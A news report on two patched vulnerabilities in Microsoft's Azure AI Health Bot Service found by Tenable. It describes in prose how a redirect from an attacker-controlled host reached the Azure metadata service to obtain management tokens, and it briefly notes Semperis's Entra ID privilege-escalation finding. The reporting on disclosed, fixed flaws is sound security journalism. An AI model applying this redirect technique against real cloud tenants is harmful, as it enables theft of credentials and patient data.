Experts Discover Weaknesses in AI-Operated Azure Health Bot Service
Serious security researchers have unearthed two vulnerabilities in Microsoft’s Azure Health Bot Service driven by AI that, if abused, could enable a malicious individual to expand their reach within client environments and access confidential patient data.
The significant flaws, which have now been fixed by Microsoft, could have opened the door to accessing resources across multiple tenants within the service, according to a recent analysis shared with The Hacker News by Tenable.
The Azure AI Health Bot Service serves as a cloud infrastructure that empowers developers in healthcare institutions to construct and deploy AI-driven virtual health aides, as well as create assistants to handle administrative tasks and communicate with their patients.
This encompasses artificial entities designed by insurance firms to enable clients to inquire about the status of a claim and seek information on benefits and services, along with agents managed by healthcare providers to aid patients in finding suitable care or locating nearby medical professionals.
Tenable’s study particularly delves into a feature of the Azure AI Health Bot Service named Data Connections, which, as implied by its name, provides a method to integrate data from external origins, whether third-party entities or the providers’ proprietary API endpoints.
Although the function is equipped with internal safeguards to thwart unauthorized access to internal APIs, further scrutiny revealed that these safeguards could be sidestepped by sending redirect responses (i.e., 301 or 302 statuses) while configuring a data connection with an external host under the attacker’s influence.
Through configuring the host to respond to requests with a 301 redirect heading for Azure’s metadata service (IMDS), Tenable asserted that it became plausible to fetch a valid metadata response and subsequently acquire an access token for management.azure[.]com.
This token could then be employed to enumerate the subscriptions it grants access to by communicating with a Microsoft endpoint which, in turn, spits back an internal subscription ID, thereby enabling the listing of accessible resources through another API call.
In a different realm, it was also found that another interface tied to interfacing systems that support the Fast Healthcare Interoperability Resources (FHIR) data exchange format was similarly vulnerable to the same form of attack.
Tenable stated that it notified Microsoft of its discoveries in June and July 2024, subsequent to which the tech giant commenced deploying fixes across all regions. There’s no indication of active exploitation of the security lapses.

“The vulnerabilities raise questions about the potential exploitation of chatbots to expose confidential details,” Tenable expressed in a statement. “Specifically, the vulnerabilities revealed a flaw in the foundational architecture of the chatbot service, emphasizing the criticality of conventional web application and cloud security in the era of AI-driven chatbots.”
This disclosure arrives shortly after Semperis outlined an attack methodology dubbed UnOAuthorized which enables privilege escalation utilizing Microsoft Entra ID (formerly Azure Active Directory), inclusive of the ability to add and remove users from privileged roles. Microsoft has since remediated the security vulnerability.
“A malicious actor could have abused such access to perform privilege elevation to Global Administrator and plant further persistence mechanisms in a tenant,” security researcher Eric Woodruff explained. “An attacker could also exploit this access for lateral movement into any system on Microsoft 365 or Azure, as well as any Software as a Service application linked to Entra ID.”


